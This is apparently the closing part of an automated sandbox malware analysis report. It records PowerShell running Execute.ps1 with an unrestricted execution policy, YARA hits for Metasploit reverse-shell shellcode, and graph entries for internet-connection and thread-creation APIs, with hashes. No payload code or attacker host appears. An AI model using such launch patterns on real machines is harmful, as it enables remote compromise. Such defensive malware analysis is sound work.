                          Jan 15, 2025 16:02:20.944092035 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: 0
                          Jan 15, 2025 16:02:20.944128036 CET479INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii:


                          Target ID:0
                          Start time:10:02:15
                          Start date:15/01/2025
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1"
                          Imagebase:0x7ff6cb6b0000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:1
                          Start time:10:02:16
                          Start date:15/01/2025
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6ee680000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:10:02:18
                          Start date:15/01/2025
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
                          Imagebase:0x7ff769950000
                          File size:2'759'232 bytes
                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:true

                          Target ID:4
                          Start time:10:02:18
                          Start date:15/01/2025
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"
                          Imagebase:0x7ff63d9a0000
                          File size:52'744 bytes
                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true


                            Execution Graph

                            Execution Coverage:3.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:33.3%
                            Total number of Nodes:12
                            Total number of Limit Nodes:0
                            execution_graph 4447 7ffb4ae5c8ac 4448 7ffb4ae5c8b5 CreateThread 4447->4448 4450 7ffb4ae5c97e 4448->4450 4451 1b129b10000 4452 1b129b10029 4451->4452 4455 1b129b10107 4452->4455 4454 1b129b1003b 4454->4454 4456 1b129b10116 LoadLibraryA InternetOpenA 4455->4456 4460 1b129b10153 InternetConnectA 4456->4460 4458 1b129b10144 InternetConnectA 4459 1b129b10177 4458->4459 4459->4454 4461 1b129b10177 4460->4461 4461->4458

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B129B10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1b129b10000_powershell.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$ConnectLibraryLoadOpen
                            • String ID: wini$U.;
                            • API String ID: 3757533923-3145566601
                            • Opcode ID: 990f7c3ebf636905d0c34521dd9b8ada892b7948d3774b6ae741d4f554ef65fc
                            • Instruction ID: de625c670e57c32dd04f7e284e35137e8203cea5b2f4817e8002d0bd36ad95f4
                            • Opcode Fuzzy Hash: 990f7c3ebf636905d0c34521dd9b8ada892b7948d3774b6ae741d4f554ef65fc
                            • Instruction Fuzzy Hash: 084158B020DB4C2FE71D56782C6AA763B9AE7533D0F6242ABF505DA1E2CE044C0582A5

                            Control-flow Graph

                            APIs
                            • InternetConnectA.WININET(00000000,00000003,00000000,00000000), ref: 000001B129B10170
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B129B10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1b129b10000_powershell.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConnectInternet
                            • String ID: U.;
                            • API String ID: 3050416762-4213443877
                            • Opcode ID: f1b67a710a49ee2396669f78a613aa1538f05a2e9cd5526a0d19065e869af148
                            • Instruction ID: e5e9ce13d7c2b4379715fd61f6aaac4983bcad111c0e1fcdf6cd7a9af0843ec8
                            • Opcode Fuzzy Hash: f1b67a710a49ee2396669f78a613aa1538f05a2e9cd5526a0d19065e869af148
                            • Instruction Fuzzy Hash: 7F315AF020DB4C2EF71D56682869B7A3B9AE7533D0F6642EBE545EA0E3DA044C098295

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 7ffb4ae5c8ac-7ffb4ae5c8b3 70 7ffb4ae5c8be-7ffb4ae5c97c CreateThread 69->70 71 7ffb4ae5c8b5-7ffb4ae5c8bd 69->71 75 7ffb4ae5c97e 70->75 76 7ffb4ae5c984-7ffb4ae5c9a1 70->76 71->70 75->76
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2382430593.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4ae50000_powershell.jbxd
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 7c0b820a993f021d3cc2f5715348f3dc25ee27c22d0e07d07f2fdcd6212eb72f
                            • Instruction ID: 86ed37b2923f146c5508dc7a0b8e4e93ff572b366333056cd5764a84d3b07f42
                            • Opcode Fuzzy Hash: 7c0b820a993f021d3cc2f5715348f3dc25ee27c22d0e07d07f2fdcd6212eb72f
                            • Instruction Fuzzy Hash: 7931287090CB488FDB1DDF6CD8056E8BBE1FB99320F10426FE049D3292CA74B8468B91

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 113 7ffb4af21bc0-7ffb4af21bc8 114 7ffb4af21c00-7ffb4af21c09 113->114 115 7ffb4af21bca-7ffb4af21be4 113->115 117 7ffb4af21c0b-7ffb4af21c18 114->117 118 7ffb4af21c22-7ffb4af21c2e 114->118 119 7ffb4af21c30-7ffb4af21c3a 115->119 124 7ffb4af21be6-7ffb4af21bf0 115->124 117->118 125 7ffb4af21c1a-7ffb4af21c20 117->125 118->119 122 7ffb4af21c3c-7ffb4af21c47 119->122 123 7ffb4af21c49-7ffb4af21c8c 119->123 122->123 127 7ffb4af21bf2-7ffb4af21bf9 124->127 125->118 127->114
                            Memory Dump Source
                            • Source File: 00000000.00000002.2383014186.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4af20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc02b261d462d71e361eb32996aea9489790fbca69196661de318fa8801b583d
                            • Instruction ID: 8b092959ed9b529aab41b4030a54d4320c8ecf4a8e5b2d62865d93fda28f19fd
                            • Opcode Fuzzy Hash: fc02b261d462d71e361eb32996aea9489790fbca69196661de318fa8801b583d
                            • Instruction Fuzzy Hash: 6C215773B0DA194FEB64ADACA4255F8B3D2EF98610B2401F7D449C31C6ED19AC4183D9

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 131 7ffb4af21be1-7ffb4af21bf9 133 7ffb4af21c00-7ffb4af21c09 131->133 134 7ffb4af21c0b-7ffb4af21c18 133->134 135 7ffb4af21c22-7ffb4af21c3a 133->135 134->135 140 7ffb4af21c1a-7ffb4af21c20 134->140 138 7ffb4af21c3c-7ffb4af21c47 135->138 139 7ffb4af21c49-7ffb4af21c8c 135->139 138->139 140->135
                            Memory Dump Source
                            • Source File: 00000000.00000002.2383014186.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4af20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7da7902c36860dabddafefc2a41665273b2e8fd6191b9649832aa6c74d8adf4
                            • Instruction ID: 36c0f65659f0438c2a04a4690411c96337452b9cb0856ca5f844fa23e38536d9
                            • Opcode Fuzzy Hash: d7da7902c36860dabddafefc2a41665273b2e8fd6191b9649832aa6c74d8adf4
                            • Instruction Fuzzy Hash: 96213873B0DE184FEBA5EDACA8115F9B3D1EB98620B1401F7D449C3186ED15DC0583C9

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2382430593.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ffb4ae50000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$7$H
                            • API String ID: 0-1876449603
                            • Opcode ID: 10aee340b17f8653da599212c9f183319754a784b07a7916a4a94a026f54ca26
                            • Instruction ID: 1613af9514841aba97ac61329dc28addb9b1375f2e92409a37a07a93588d7acd
                            • Opcode Fuzzy Hash: 10aee340b17f8653da599212c9f183319754a784b07a7916a4a94a026f54ca26
                            • Instruction Fuzzy Hash: 5812E3C394EAC21BE755AFFCAE56068AFD5FF4269073901FFD1D40A0CF941A99058386